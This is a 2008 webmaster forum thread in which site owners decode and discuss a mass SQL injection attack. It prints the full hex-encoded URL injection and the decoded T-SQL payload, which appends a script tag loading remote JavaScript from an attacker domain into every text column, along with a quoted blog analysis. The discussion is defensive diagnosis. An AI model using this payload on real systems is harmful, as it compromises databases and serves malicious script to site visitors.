| T O P I C R E V I E W |
| Mr Pink |
Posted - 02 February 2008 : 08:32:24
One of my sites uses Fullxml which is perfect for the job. This week I have noticed a handful of strange url requests to the site like this
default.asp?id=28&mnu=http://www.domain.co.uk/forum/lovuqo/zil/&
I'm puzzled as to why someone is accessing the site by adding the http bit to the normal url. There are a few of these and they are all different.
< |
| 15 L A T E S T R E P L I E S (Newest First) |
| Podge |
Posted - 14 May 2008 : 12:27:22
You need to sanitise all user input. Lots of stuff on Google< |
| Astralis |
Posted - 14 May 2008 : 12:12:35
That's exactly what happened to me. How did they get in? How to stop this??< |
| Podge |
Posted - 14 May 2008 : 08:18:37
Thats nasty. The query inserts a javascript into every text type column in your database.< |
| AnonJr |
Posted - 14 May 2008 : 08:15:15
Persistant buggers.< |
| Mr Pink |
Posted - 14 May 2008 : 07:37:41
There was another attempt today. I posted the string into the convertor and it came up with this
quote:
?DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.direct84.com/7.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
< |
| Podge |
Posted - 13 May 2008 : 14:50:20
No problem. If its a CMS you're after then try Umbraco.< |
| Mr Pink |
Posted - 13 May 2008 : 13:32:08
Thanks for the information about the script Podge. Very interesting.
I've been trying to get support for months and have decided to change to another package.< |
| Podge |
Posted - 13 May 2008 : 11:24:41
It doesn't look like there a lot of support for FullXml anymore. You might want to ask if there are any security issues on their forum - http://sourceforge.net/forum/forum.php?forum_id=118410< |
| Mr Pink |
Posted - 13 May 2008 : 10:48:13
quote:
Originally posted by Podge
0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045 converted to string is ?DECLARE @T varchar(255),@C varchar(255) DECLARE
Is there anymore of the hex number i.e. did you trim it before posting ? More than likely there's a url embedded in it.
http://www.string-functions.com/hex-string.aspx
There is my own url on the end of it, that's all< |
| Podge |
Posted - 13 May 2008 : 10:17:33
Its nothing new. Hackers are always trying to disguise what they are doing.
I heard about it from SSWUG a few weeks ago - http://www.sswug.org< |
| AnonJr |
Posted - 13 May 2008 : 10:06:19
I just learned something new. I would have never thought of someone encoding the string like that.
Thanks for that Podge.  < |
| Podge |
Posted - 13 May 2008 : 09:29:10
0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045 converted to string is ?DECLARE @T varchar(255),@C varchar(255) DECLARE
Is there anymore of the hex number i.e. did you trim it before posting ? More than likely there's a url embedded in it.
http://www.string-functions.com/hex-string.aspx< |
| Podge |
Posted - 13 May 2008 : 09:24:12
Its part of a mass sql injection attack - http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx
quote:
This looks a little complicated but, if we remove the encoding, we get this:
DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x440045004300...7200 AS NVARCHAR(4000));
EXEC(@S);--
So, here's what this little bit of T-SQL is doing:
Declaring a variable, S, as an NVARCHAR. For those of us who don't speak T-SQL natively, think of this as a string.
Taking a long hex value (I took out a few hundred characters where the ... is there) that is really a Unicode string(1) and casting it as NVARCHAR. In other words, we're taking this hex representation of a string and turning it into a real string.
Once that's done, we execute that string as a T-SQL statement.
So, of course, the next question is "What is that string?" Here it is, with a bit of sanitization:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
This one is a little more complicated but it does something like this:
Declare a few variables that are used later.
Do a SQL query on the sysobjects and syscolumns tables. This is some serious mojo as these tables contain a list of ALL the tables and ALL the columns in the database. What this query is looking for is every column in the entire database with a type that contains strings.
Now, we're going to loop through all of those columns and, in every one of them...
...we're going to append the <script>...</script> text.
Finally, clean up and we're done.
Now that this has run, every bit of text in your database has this malicious script tag appended to it. If you're using that database to contain text/HTML that you're going to insert into your webpages and display to your users, you are now serving up a malicious script to every one of your trusting customers.
< |
| AnonJr |
Posted - 13 May 2008 : 09:18:22
Off the top of my head it looks like its trying to inject some SQL, but I couldn't say for sure what its specifically trying to do. If you sanitize your query strings properly I don't think its anything to worry about. But I'd get a second opinion on that.  < |
| Mr Pink |
Posted - 13 May 2008 : 08:29:55
default.asp?id=2&mnu=2;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045
Does anyone know what the above inserted into a url will do?
< |
